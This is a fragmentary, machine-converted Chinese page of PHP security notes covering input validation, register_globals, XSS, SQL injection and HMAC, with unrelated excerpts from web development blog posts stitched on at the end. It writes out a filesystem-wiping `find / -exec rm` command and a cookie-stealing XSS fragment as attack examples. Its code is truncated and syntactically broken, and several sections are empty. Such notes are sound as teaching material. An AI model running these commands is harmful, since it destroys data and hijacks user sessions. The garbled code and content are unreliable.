一,使用者輸入
要求驗證所有的使用者輸入
1,register_globals -->off
file_exists($module.'.php');
<?php 'find / -exec rm "{}" ";"'; ?>
2,跨站指令碼
<?php echo $_get['js']; ?>
document.location='+document.cookie
3,sql注入
addslashes()特殊字串轉義
4,驗證輸入
型別驗證:
if(!isset($_get['id']) else
$tmp[$name] = $vars[$name];
if (isset($sig['type'])) ;
}if(isset($sig['function']))
}$vars = $tmp;
$result = array(
'result' => true,
);return $result;
}對應測試用例
class testofsanize extends unittestcase
function testrequired()
}$test = &new testofsanize();
$test->run(new htmlreporter());
5,hmac
鑑定資訊關鍵字雜湊
雜湊,**。
6,異常
7,密碼
web開發通用寶典
1 引用css檔案 2 引用js檔案 3 動態引用js檔案 4 html5頭定義 5 js檔案內定義事件 function 定義物件 obj.person 使用者 為物件新增元素並賦值 obj.order 1 為物件新增元素並賦值 var objcolor 定義空陣列 objcolor.push 4...
web開發中的路徑問題
在 j2ee 開發中不免會遇到取路徑的時候,而 web開發時有相對路徑和絕對路徑之分,而且還有 web路徑和真實路徑的區別,面對這樣的問題時,我種是記不清應該呼叫哪些方法,所以記在 blog 中備察。準備工作 我的 訪問路徑是 的物理儲存路徑是 c chhoweb root 記錄開始 l在 acti...
web開發中遇到的問題
1.如果用提交表單時,如果控制項的屬性置成disabled true,時,瀏覽器就不會將該控制項的值傳送給伺服器 通過抓包就可以看到,在line base text data資料中沒有該控制項的名字 值對 例子 所以在獲取該控制項資料時,得到的是空 比如在cgi中呼叫函式cgiformstringn...